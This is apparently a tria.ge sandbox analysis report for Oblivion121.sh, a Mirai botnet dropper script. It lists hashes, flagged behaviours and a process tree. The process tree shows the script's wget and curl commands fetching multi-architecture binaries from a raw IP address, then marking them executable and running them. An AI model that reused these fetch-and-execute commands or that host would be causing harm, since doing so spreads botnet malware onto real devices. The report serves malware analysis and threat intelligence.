Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
15/12/2024, 10:40
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Oblivion121.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
90e5e43e5d798a41934d7f30e8208b24
-
SHA1
0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7
-
SHA256
09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233
-
SHA512
ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032
Malware Config
Extracted
mirai
MIRAI
Signatures
-
Mirai family
-
Contacts a large (42906) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 730 chmod 736 chmod 779 chmod 817 chmod 858 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/cp 731 cp /tmp/cp 737 cp /tmp/cp 780 cp /tmp/cp 818 cp /tmp/cp 859 cp -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
description ioc Process File opened for reading /proc/335/fd cp File opened for reading /proc/744/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/235/fd cp File opened for reading /proc/743/fd cp File opened for reading /proc/328/fd cp File opened for reading /proc/690/fd cp File opened for reading /proc/811/fd cp File opened for reading /proc/701/fd cp File opened for reading /proc/330/fd cp File opened for reading /proc/740/fd cp File opened for reading /proc/493/fd cp File opened for reading /proc/794/fd cp File opened for reading /proc/167/fd cp File opened for reading /proc/492/fd cp File opened for reading /proc/328/fd cp File opened for reading /proc/328/fd cp File opened for reading /proc/740/fd cp File opened for reading /proc/140/fd cp File opened for reading /proc/462/fd cp File opened for reading /proc/493/fd cp File opened for reading /proc/492/fd cp File opened for reading /proc/389/fd cp File opened for reading /proc/493/fd cp File opened for reading /proc/376/fd cp File opened for reading /proc/738/fd cp File opened for reading /proc/328/fd cp File opened for reading /proc/335/fd cp File opened for reading /proc/743/fd cp File opened for reading /proc/361/fd cp File opened for reading /proc/456/fd cp File opened for reading /proc/707/fd cp File opened for reading /proc/803/fd cp File opened for reading /proc/698/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/375/fd cp File opened for reading /proc/376/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/822/fd cp File opened for reading /proc/691/fd cp File opened for reading /proc/691/fd cp File opened for reading /proc/701/fd cp File opened for reading /proc/751/fd cp File opened for reading /proc/862/fd cp File opened for reading /proc/741/fd cp File opened for reading /proc/743/fd cp File opened for reading /proc/402/fd cp File opened for reading /proc/235/fd cp File opened for reading /proc/698/fd cp File opened for reading /proc/701/fd cp File opened for reading /proc/799/fd cp File opened for reading /proc/376/fd cp File opened for reading /proc/783/fd cp File opened for reading /proc/783/fd cp File opened for reading /proc/330/fd cp File opened for reading /proc/330/fd cp File opened for reading /proc/335/fd cp File opened for reading /proc/389/fd cp File opened for reading /proc/787/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/456/fd cp File opened for reading /proc/778/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/860/fd cp -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 733 wget 734 curl 735 cat 737 cp -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGz.mpsl curl File opened for modification /tmp/IGz.arm4 curl File opened for modification /tmp/IGz.arm5 curl File opened for modification /tmp/IGz.arm6 wget File opened for modification /tmp/IGz.arm6 curl File opened for modification /tmp/IGz.mips wget File opened for modification /tmp/IGz.mpsl wget File opened for modification /tmp/cp Oblivion121.sh File opened for modification /tmp/IGz.mips curl File opened for modification /tmp/IGz.arm5 wget File opened for modification /tmp/IGz.x86 wget File opened for modification /tmp/IGz.x86 curl
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Writes file to tmp directory
PID:698 -
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.x862⤵
- Writes file to tmp directory
PID:706
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.x862⤵
- Writes file to tmp directory
PID:719
-
-
/bin/catcat IGz.x862⤵PID:729
-
-
/bin/chmodchmod +x cp IGz.x86 Oblivion121.sh systemd-private-ce7c6e8a3a3f4152b6b47b0b826ed39e-systemd-timedated.service-AWdkDw2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/cp./cp x862⤵
- Executes dropped EXE
PID:731
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:733
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734
-
-
/bin/catcat IGz.mips2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-ce7c6e8a3a3f4152b6b47b0b826ed39e-systemd-timedated.service-AWdkDw2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/cp./cp mips2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mpsl2⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/chmodchmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/cp./cp mpsl2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:780
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm42⤵PID:784
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm42⤵
- Writes file to tmp directory
PID:815
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/cp./cp arm42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:818
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm52⤵
- Writes file to tmp directory
PID:825
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/cp./cp arm52⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:859
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm62⤵
- Writes file to tmp directory
PID:863
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD5acd283bf65ed831dd470134f403a9294
SHA13c0f8231e8089430e32ef8daea73597170a2b4c0
SHA2568d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67
SHA5120847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72
-
Filesize
153KB
MD5558fc8df865663836770a42334dd88c0
SHA10276f7274984928e64fbe354bb0df966d1eacb86
SHA256b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118
SHA512561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e